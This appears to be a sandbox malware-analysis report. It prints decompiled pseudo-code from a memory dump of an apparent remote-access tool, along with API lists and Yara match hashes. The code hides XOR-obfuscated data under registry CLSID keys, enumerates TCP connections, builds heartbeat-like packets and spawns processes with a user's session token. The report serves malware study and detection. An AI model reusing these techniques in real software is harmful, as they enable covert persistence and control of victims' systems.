                                                                                    						_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t63 + 4)))) + 0x54))();
                                                                                    						__eflags = _v12 - _v8 - _t44;
                                                                                    						if(_v12 - _v8 <= _t44) {
                                                                                    							_t69 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                    							_t45 = _t82;
                                                                                    							_v8 = _t69;
                                                                                    							__eflags = _t82;
                                                                                    							if(_t82 == 0) {
                                                                                    								_t45 = timeGetTime();
                                                                                    								_t69 = _v8;
                                                                                    							}
                                                                                    							__eflags = _t45 - _t69;
                                                                                    							if(_t45 - _t69 >= 0) {
                                                                                    								_t80 =  *((intOrPtr*)(_t63 + 0x40));
                                                                                    								 *(_t63 + 0x14) =  *(_t63 + 0x14) + 1;
                                                                                    								_t70 =  *(_t63 + 0x14);
                                                                                    								__eflags =  *(_t80 + 0x50) * _t70 - 0x7d0;
                                                                                    								if(__eflags >= 0) {
                                                                                    									_t71 = 0x7d0;
                                                                                    								} else {
                                                                                    									_t21 = _t70 + 1; // 0x1
                                                                                    									_t57 = _t21;
                                                                                    									 *(_t63 + 0x14) = _t57;
                                                                                    									_t71 =  *(_t80 + 0x50) * _t57;
                                                                                    								}
                                                                                    								 *((intOrPtr*)(_t63 + 0x10)) = _t71 + _t82;
                                                                                    								_push(0xc);
                                                                                    								_v8 =  *((intOrPtr*)(_t63 + 0x20));
                                                                                    								_t51 = E04ED5785(_t71, _t93, __eflags);
                                                                                    								_v12 = _t51;
                                                                                    								__eflags =  *(_t63 + 0x24) - 2;
                                                                                    								 *_t51 = 0xbb4f;
                                                                                    								 *((char*)(_t51 + 3)) = 0xbb00 |  *(_t63 + 0x24) == 0x00000002;
                                                                                    								 *((char*)(_t51 + 2)) = 1;
                                                                                    								 *((intOrPtr*)(_t51 + 4)) =  *((intOrPtr*)(_t63 + 0x1c));
                                                                                    								 *((intOrPtr*)(_t51 + 8)) = _v8;
                                                                                    								LeaveCriticalSection(_t93);
                                                                                    								asm("sbb ecx, ecx");
                                                                                    								__eflags =  ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004;
                                                                                    								_t54 = E04ECE580( ~( *(_v16 + 8)) &  *(_v16 + 8) + 0x00000004, _v12, 0xc, 0);
                                                                                    								E04ED573F(_v12);
                                                                                    								return _t54;
                                                                                    							} else {
                                                                                    								LeaveCriticalSection(_t93);
                                                                                    								return 1;
                                                                                    							}
                                                                                    						} else {
                                                                                    							SetLastError(0x5b4);
                                                                                    							__eflags = 0;
                                                                                    							LeaveCriticalSection(_t93);
                                                                                    							return 0;
                                                                                    						}
                                                                                    					} else {
                                                                                    						SetLastError(0x139f);
                                                                                    						__eflags = 0;
                                                                                    						LeaveCriticalSection(_t93);
                                                                                    						return 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					SetLastError(0x139f);
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}
                                                                                    0x04ed1b8a
                                                                                    0x04ed1ad9
                                                                                    0x04ed1adf
                                                                                    0x04ed1aed
                                                                                    0x04ed1aed
                                                                                    0x04ed1aa3
                                                                                    0x04ed1aa8
                                                                                    0x04ed1aaf
                                                                                    0x04ed1ab1
                                                                                    0x04ed1abf
                                                                                    0x04ed1abf
                                                                                    0x04ed1a56
                                                                                    0x04ed1a5b
                                                                                    0x04ed1a62
                                                                                    0x04ed1a64
                                                                                    0x04ed1a72
                                                                                    0x04ed1a72
                                                                                    0x04ed1a32
                                                                                    0x04ed1a37
                                                                                    0x04ed1a43
                                                                                    0x04ed1a43

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1A37
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?), ref: 04ED1A4A
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1A5B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1A64
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    • Opcode ID: e22a4e535c7315c5de3966c99bcbefb5a8f0327a3cba41aad50ac1ebcbb954f4
                                                                                    • Instruction ID: 4072e38d3dce406bd6c925834e6e510c22a826c42c23927b013b006ad0b53bfe
                                                                                    • Opcode Fuzzy Hash: e22a4e535c7315c5de3966c99bcbefb5a8f0327a3cba41aad50ac1ebcbb954f4
                                                                                    • Instruction Fuzzy Hash: D641B176B00104DFCB04CFA9E484AA9BBB5FF88316F1541AAED0ACB345DB35E901CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 54%
                                                                                    			E04EBDEF0(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t21;
                                                                                    				void* _t22;
                                                                                    				int _t27;
                                                                                    				int _t34;
                                                                                    				intOrPtr _t39;
                                                                                    				void* _t41;
                                                                                    				void* _t43;
                                                                                    				void* _t48;
                                                                                    				void* _t52;
                                                                                    				void* _t58;
                                                                                    				void* _t66;
                                                                                    				void* _t67;
                                                                                    				void* _t70;
                                                                                    				void* _t74;
                                                                                    				intOrPtr* _t78;
                                                                                    				void* _t79;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_push(_t67);
                                                                                    				_t58 = _a8;
                                                                                    				_t39 = __ecx;
                                                                                    				_v8 = __ecx;
                                                                                    				if(_t58 != 0) {
                                                                                    					_t78 = _a4 + 8;
                                                                                    					_t66 = (_t58 - 1 >> 4) + 1;
                                                                                    					do {
                                                                                    						E04EBDE40(__ecx,  *((intOrPtr*)(_t78 - 8)),  *((intOrPtr*)(_t78 - 4)),  *_t78,  *((intOrPtr*)(_t78 + 4)));
                                                                                    						_t79 = _t79 + 8;
                                                                                    						_t78 = _t78 + 0x10;
                                                                                    						_t66 = _t66 - 1;
                                                                                    					} while (_t66 != 0);
                                                                                    				}
                                                                                    				Sleep(0x64);
                                                                                    				_t21 =  *((intOrPtr*)(_t39 + 0xc));
                                                                                    				if(_t21 != 2) {
                                                                                    					__eflags = _t21 - 3;
                                                                                    					if(__eflags != 0) {
                                                                                    						_t22 = E04EBDB70(_t39, __eflags);
                                                                                    						goto L10;
                                                                                    					} else {
                                                                                    						_t22 = E04EBD960(_t58, _t67);
                                                                                    						_a8 = _t22;
                                                                                    						__eflags = _t22;
                                                                                    						if(_t22 == 0) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							_t16 = LocalSize(_t22) + 1; // 0x1
                                                                                    							_t41 = LocalAlloc(0x40, _t16);
                                                                                    							_t70 = _a8;
                                                                                    							_t18 = _t41 + 1; // 0x1
                                                                                    							_t48 = _t18;
                                                                                    							 *_t41 = 0x8e;
                                                                                    							E04EDDC90(_t48, _t70, _t23);
                                                                                    							LocalFree(_t70);
                                                                                    							_t27 = LocalSize(_t41);
                                                                                    							_push(_t48);
                                                                                    							_push(0x3f);
                                                                                    							_push(_t27);
                                                                                    							_push(_t41);
                                                                                    							E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    							return LocalFree(_t41);
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t22 = E04EBD550(_t58, _t67);
                                                                                    					_a8 = _t22;
                                                                                    					if(_t22 == 0) {
                                                                                    						L10:
                                                                                    						return _t22;
                                                                                    					} else {
                                                                                    						_t10 = LocalSize(_t22) + 1; // 0x1
                                                                                    						_t43 = LocalAlloc(0x40, _t10);
                                                                                    						_t74 = _a8;
                                                                                    						_t12 = _t43 + 1; // 0x1
                                                                                    						_t52 = _t12;
                                                                                    						 *_t43 = 0x8e;
                                                                                    						E04EDDC90(_t52, _t74, _t30);
                                                                                    						LocalFree(_t74);
                                                                                    						_t34 = LocalSize(_t43);
                                                                                    						_push(_t52);
                                                                                    						_push(0x3f);
                                                                                    						_push(_t34);
                                                                                    						_push(_t43);
                                                                                    						E04EB1C60( *((intOrPtr*)(_v8 + 4)));
                                                                                    						return LocalFree(_t43);
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDF2D
                                                                                    • LocalSize.KERNEL32 ref: 04EBDF52
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDF5C
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDF7F
                                                                                    • LocalSize.KERNEL32 ref: 04EBDF82
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDF95
                                                                                      • Part of subcall function 04EBDE40: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 04EBDE60
                                                                                      • Part of subcall function 04EBDE40: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 04EBDE7B
                                                                                    • LocalSize.KERNEL32 ref: 04EBDFB8
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,04EBD46F,?,?), ref: 04EBDFC2
                                                                                    • LocalFree.KERNEL32(?), ref: 04EBDFE5
                                                                                    • LocalSize.KERNEL32 ref: 04EBDFE8
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 04EBDFFB
                                                                                      • Part of subcall function 04EBDB70: LocalAlloc.KERNEL32(00000040,74E45A91,00000000,?,?), ref: 04EBDBBE
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBE0
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(?,?,?,?), ref: 04EBDBFE
                                                                                      • Part of subcall function 04EBDB70: LocalSize.KERNEL32 ref: 04EBDC05
                                                                                      • Part of subcall function 04EBDB70: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 04EBDC1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$Free$Size$Alloc$Table$Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 1439515551-0
                                                                                    • Opcode ID: c0daa8e014a3216806d279f935c729db051a27519f78ddfc595ab702f29fac7e
                                                                                    • Instruction ID: 1b999fa1e84b50401c7effd179511499b8a3a118bb7d65078798d17aa1435f9c
                                                                                    • Opcode Fuzzy Hash: c0daa8e014a3216806d279f935c729db051a27519f78ddfc595ab702f29fac7e
                                                                                    • Instruction Fuzzy Hash: 7E310A76A002186BD710EFA9DC80CABB7AEEF89265B044169FD59D7245DA31FD00CFE0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 93%
                                                                                    			E04EBE850(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				short _v1128;
                                                                                    				void* _v1132;
                                                                                    				char _v1136;
                                                                                    				int* _v1140;
                                                                                    				int _v1144;
                                                                                    				void* _v1148;
                                                                                    				int _v1152;
                                                                                    				int _v1156;
                                                                                    				void* __ebp;
                                                                                    				signed int _t49;
                                                                                    				int* _t57;
                                                                                    				void* _t72;
                                                                                    				void* _t74;
                                                                                    				void* _t75;
                                                                                    				int _t84;
                                                                                    				signed int* _t85;
                                                                                    				signed int* _t89;
                                                                                    				char _t93;
                                                                                    				int* _t95;
                                                                                    				char _t96;
                                                                                    				int* _t98;
                                                                                    				signed int* _t99;
                                                                                    				signed int _t101;
                                                                                    				void* _t102;
                                                                                    				void* _t103;
                                                                                    				void* _t104;
                                                                                    				signed int _t117;
                                                                                    
                                                                                    				_t49 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t49 ^ _t101;
                                                                                    				_t95 = 0;
                                                                                    				_t85 = L"Pg";
                                                                                    				_v1140 = 0;
                                                                                    				E04EC6010(__ebx, _t85,  &_v88, 0, __esi);
                                                                                    				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				_t103 = _t102 + 0xc;
                                                                                    				_t84 = 0;
                                                                                    				_t57 = RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20119,  &_v1132);
                                                                                    				if(_t57 == 0) {
                                                                                    					_v1144 = 0x104;
                                                                                    					if(RegEnumKeyExW(_v1132, 0,  &_v608,  &_v1144, _t57, _t57, _t57, _t57) == 0) {
                                                                                    						_push(__esi);
                                                                                    						do {
                                                                                    							_t84 = _t84 + 1;
                                                                                    							if(_v1144 == 0x10) {
                                                                                    								_v1152 = 4;
                                                                                    								_t98 = 0;
                                                                                    								_v1136 = 0;
                                                                                    								_v1148 = 0;
                                                                                    								if(RegOpenKeyExW(_v1132,  &_v608, 0, 0x20119,  &_v1148) != 0) {
                                                                                    									L8:
                                                                                    									_t96 = 1;
                                                                                    								} else {
                                                                                    									if(RegQueryValueExW(_v1148, "2", 0,  &_v1156,  &_v1136,  &_v1152) == 0) {
                                                                                    										_t98 =  ==  ? 1 : 0;
                                                                                    									}
                                                                                    									RegCloseKey(_v1148);
                                                                                    									_t96 = _v1136;
                                                                                    									if(_t98 == 0) {
                                                                                    										goto L8;
                                                                                    									}
                                                                                    								}
                                                                                    								_push(_t85);
                                                                                    								_v1136 = 0;
                                                                                    								_t85 = _v1132;
                                                                                    								_t99 = E04EC0C20(_t85,  &_v608, _t85,  &_v1136);
                                                                                    								_t103 = _t103 + 0xc;
                                                                                    								if(_t99 == 0) {
                                                                                    									_t95 = _v1140;
                                                                                    								} else {
                                                                                    									_t93 = _v1136;
                                                                                    									if(_t93 > 1) {
                                                                                    										_t31 = _t93 - 1; // -1
                                                                                    										_t74 = _t31;
                                                                                    										 *(_t74 + _t99) =  *(_t74 + _t99) ^  *_t99;
                                                                                    										_t75 = _t74 - 1;
                                                                                    										while(_t75 != 0) {
                                                                                    											 *(_t75 + _t99) =  *(_t75 + _t99) ^  *(_t75 +  &(_t99[0]));
                                                                                    											_t75 = _t75 - 1;
                                                                                    										}
                                                                                    										_t89 = _t75 + _t99;
                                                                                    										 *_t89 =  *_t89 ^ _t89[0];
                                                                                    										_t117 =  *_t89;
                                                                                    									}
                                                                                    									_t85 = _t99;
                                                                                    									_t72 = E04EBF010(_t84, _t93, _t96, _t99, _t117, 1, _t96);
                                                                                    									_t95 = _v1140;
                                                                                    									_t104 = _t103 + 8;
                                                                                    									if(_t72 != 0) {
                                                                                    										_v1140 = _t95;
                                                                                    									}
                                                                                    									E04ED573F(_t99);
                                                                                    									_t103 = _t104 + 4;
                                                                                    								}
                                                                                    							}
                                                                                    							_v1144 = 0x104;
                                                                                    						} while (RegEnumKeyExW(_v1132, _t84,  &_v608,  &_v1144, 0, 0, 0, 0) == 0);
                                                                                    					}
                                                                                    					RegCloseKey(_v1132);
                                                                                    				}
                                                                                    				return E04ED572E(_v8 ^ _t101);
                                                                                    			}

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBE88A
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EBE8AE
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04EBE8DF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,74E043E0), ref: 04EBE930
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD124,00000000,?,?,00000004), ref: 04EBE95B
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBE97A
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000,74E043E0), ref: 04EBEA3E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBEA53
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EBE884
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpen$EnumQueryValue$wsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 617139280-1183003970
                                                                                    • Opcode ID: 789a55ab489e4fdb4c276afa904a9c565925a176b39e3a4a53e0a8b8292dbd73
                                                                                    • Instruction ID: 2c70b32d174ab438916f5a86b2a2c5a4c13f88ddcb7cdec39f36b1286a4535fd
                                                                                    • Opcode Fuzzy Hash: 789a55ab489e4fdb4c276afa904a9c565925a176b39e3a4a53e0a8b8292dbd73
                                                                                    • Instruction Fuzzy Hash: 9F5187B19002289FDB218F64DC44FEAB77CEF45308F1051D9EA89A7101E771AE89CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E04EBEA70(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				char _v616;
                                                                                    				signed int _t34;
                                                                                    				int _t64;
                                                                                    				void* _t78;
                                                                                    				void* _t79;
                                                                                    				char* _t85;
                                                                                    				signed int _t86;
                                                                                    
                                                                                    				_t34 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t34 ^ _t86;
                                                                                    				_t64 = __edx;
                                                                                    				_t85 = __ecx;
                                                                                    				if(__edx >= 0x5c) {
                                                                                    					if(__edx !=  *((intOrPtr*)(__ecx + 0x1c)) + 0x5c +  *((intOrPtr*)(__ecx + 0x24)) +  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                    						goto L1;
                                                                                    					} else {
                                                                                    						_push(__edi);
                                                                                    						E04EC6010(__edx, L"Pg",  &_v88, __edi, __ecx);
                                                                                    						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, __ecx + 0x28);
                                                                                    						E04EC5490(_t85, _t64);
                                                                                    						_v616 = 1;
                                                                                    						_v612 = 0;
                                                                                    						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                                                    							RegSetValueExW(_v612, "2", 0, 4,  &_v616, 4);
                                                                                    							RegCloseKey(_v612);
                                                                                    						}
                                                                                    						_v612 = 0;
                                                                                    						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                                                    							RegSetValueExW(_v612, "1", 0, 3, _t85, _t64);
                                                                                    							asm("sbb edi, edi");
                                                                                    							RegCloseKey(_v612);
                                                                                    						}
                                                                                    						if(_t64 > 1) {
                                                                                    							_t78 = _t64 - 1;
                                                                                    							 *(_t78 + _t85) =  *(_t78 + _t85) ^  *_t85;
                                                                                    							_t79 = _t78 - 1;
                                                                                    							while(_t79 != 0) {
                                                                                    								 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                                                    								_t79 = _t79 - 1;
                                                                                    							}
                                                                                    							 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                                                    						}
                                                                                    						return E04ED572E(_v8 ^ _t86);
                                                                                    					}
                                                                                    				} else {
                                                                                    					L1:
                                                                                    					return E04ED572E(_v8 ^ _t86);
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • wsprintfW.USER32 ref: 04EBEAD4
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 04EBEB1C
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,00000001,00000004), ref: 04EBEB44
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBEB4C
                                                                                    • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 04EBEB7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$CloseValuewsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s\%s$\
                                                                                    • API String ID: 1643814758-3376016971
                                                                                    • Opcode ID: ad99b57332ab9b180637fd34a156cf4b69f31c66b0242e7360f2e84e11cd811c
                                                                                    • Instruction ID: c7c706f7dff4f23b543f76b89dde41057200602bc0888b7d45a2e77ebf21a402
                                                                                    • Opcode Fuzzy Hash: ad99b57332ab9b180637fd34a156cf4b69f31c66b0242e7360f2e84e11cd811c
                                                                                    • Instruction Fuzzy Hash: 4141EB30604318ABD730DF68DC85FEA7BB9FF84704F500099E94AAA181D671AD44DB54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 94%
                                                                                    			E04EBE6D0(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v92;
                                                                                    				short _v612;
                                                                                    				short _v1132;
                                                                                    				int _v1136;
                                                                                    				void* _v1140;
                                                                                    				void* _v1144;
                                                                                    				char _v1148;
                                                                                    				signed int _t27;
                                                                                    				int* _t35;
                                                                                    				char _t54;
                                                                                    				int _t65;
                                                                                    				signed int _t66;
                                                                                    
                                                                                    				_t27 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t27 ^ _t66;
                                                                                    				_t54 = __ecx;
                                                                                    				E04EC6010(__ecx, L"Pg",  &_v92, __edi, __esi);
                                                                                    				wsprintfW( &_v1132, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v92);
                                                                                    				_t65 = 0;
                                                                                    				_t35 = RegOpenKeyExW(0x80000002,  &_v1132, 0, 0x20119,  &_v1140);
                                                                                    				if(_t35 != 0) {
                                                                                    					L8:
                                                                                    					if(_t54 == 0) {
                                                                                    						E04EBE630();
                                                                                    						return E04ED572E(_v8 ^ _t66);
                                                                                    					} else {
                                                                                    						E04EBE5C0();
                                                                                    						return E04ED572E(_v8 ^ _t66);
                                                                                    					}
                                                                                    				}
                                                                                    				_v1136 = 0x104;
                                                                                    				if(RegEnumKeyExW(_v1140, 0,  &_v612,  &_v1136, _t35, _t35, _t35, _t35) != 0) {
                                                                                    					L7:
                                                                                    					RegCloseKey(_v1140);
                                                                                    					goto L8;
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t65 = _t65 + 1;
                                                                                    						if(_v1136 == 0x10) {
                                                                                    							_v1148 = _t54;
                                                                                    							_v1144 = 0;
                                                                                    							if(RegCreateKeyExW(_v1140,  &_v612, 0, 0, 0, 0x20106, 0,  &_v1144, 0) == 0) {
                                                                                    								RegSetValueExW(_v1144, "2", 0, 4,  &_v1148, 4);
                                                                                    								RegCloseKey(_v1144);
                                                                                    							}
                                                                                    						}
                                                                                    						_v1136 = 0x104;
                                                                                    					} while (RegEnumKeyExW(_v1140, _t65,  &_v612,  &_v1136, 0, 0, 0, 0) == 0);
                                                                                    					goto L7;
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04EBE705
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04EBE729
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 04EBE75A
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 04EBE7AD
                                                                                    • RegSetValueExW.ADVAPI32(00000000,04EFD124,00000000,00000004,?,00000004), ref: 04EBE7CF
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBE7DB
                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000), ref: 04EBE804
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04EBE818
                                                                                    Strings
                                                                                    • SOFTWARE\Classes\CLSID\%s, xrefs: 04EBE6FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 2517750250-1183003970
                                                                                    • Opcode ID: 1e28960e59683dce02f6305c8a4b727013348412db23b1f9e96121009b1f2eed
                                                                                    • Instruction ID: be800958df76569c90440dcc2c94f90e940092caa359fdc8a1661eedd3c05f6d
                                                                                    • Opcode Fuzzy Hash: 1e28960e59683dce02f6305c8a4b727013348412db23b1f9e96121009b1f2eed
                                                                                    • Instruction Fuzzy Hash: B14142B1640228BAEB209F65DC85FEAB77CEF44705F0011A6AF49E6180D7716E44CFA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E04EC72A0(void* __ebx, intOrPtr __edx, void* __eflags, WCHAR* _a8, struct _PROCESS_INFORMATION* _a20) {
                                                                                    				void* _v8;
                                                                                    				void* _v12;
                                                                                    				struct _STARTUPINFOW _v80;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				struct HINSTANCE__* _t26;
                                                                                    				_Unknown_base(*)()* _t27;
                                                                                    				void* _t29;
                                                                                    				void* _t34;
                                                                                    				long _t36;
                                                                                    				intOrPtr _t37;
                                                                                    				void* _t38;
                                                                                    
                                                                                    				_t36 = 0;
                                                                                    				_t37 = __edx;
                                                                                    				E04EDDAD0(0,  &(_v80.lpReserved), 0, 0x40);
                                                                                    				_v80.cb = 0x44;
                                                                                    				_v80.lpDesktop = _t37;
                                                                                    				_v8 = 0;
                                                                                    				if(E04ECA980() != 2) {
                                                                                    					return CreateProcessW(0, _a8, 0, 0, 0, 0, 0, 0,  &_v80, _a20);
                                                                                    				} else {
                                                                                    					_t38 = E04EC70A0(__ebx, 0, _t37);
                                                                                    					if(_t38 != 0) {
                                                                                    						_v12 = 0;
                                                                                    						_t26 = LoadLibraryA("Wtsapi32.dll");
                                                                                    						if(_t26 != 0) {
                                                                                    							_t27 = GetProcAddress(_t26, "WTSQueryUserToken");
                                                                                    							if(_t27 != 0) {
                                                                                    								_push( &_v12);
                                                                                    								_push(_t38);
                                                                                    								if( *_t27() != 0) {
                                                                                    									_t29 =  &_v8;
                                                                                    									__imp__CreateEnvironmentBlock(_t29, _v12, 0);
                                                                                    									if(_t29 != 0) {
                                                                                    										_t29 = _v8;
                                                                                    										_t36 = 0x400;
                                                                                    									} else {
                                                                                    										_v8 = _t29;
                                                                                    									}
                                                                                    									CreateProcessAsUserW(_v12, 0, _a8, 0, 0, 0, _t36, _t29, 0,  &_v80, _a20);
                                                                                    									_t34 = _v8;
                                                                                    									if(_t34 != 0) {
                                                                                    										__imp__DestroyEnvironmentBlock(_t34);
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                      • Part of subcall function 04ECA980: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04ECA9BE
                                                                                      • Part of subcall function 04ECA980: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 04ECA9D1
                                                                                      • Part of subcall function 04ECA980: FreeSid.ADVAPI32(?), ref: 04ECA9DA
                                                                                    • CreateProcessW.KERNEL32 ref: 04EC737A
                                                                                      • Part of subcall function 04EC70A0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 04EC70DD
                                                                                      • Part of subcall function 04EC70A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04EC70F5
                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04EC72E9
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04EC72F9
                                                                                    • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 04EC7316
                                                                                    • CreateProcessAsUserW.ADVAPI32(?,00000000,04EB6928,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04EC7346
                                                                                    • DestroyEnvironmentBlock.USERENV(?), ref: 04EC7354
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
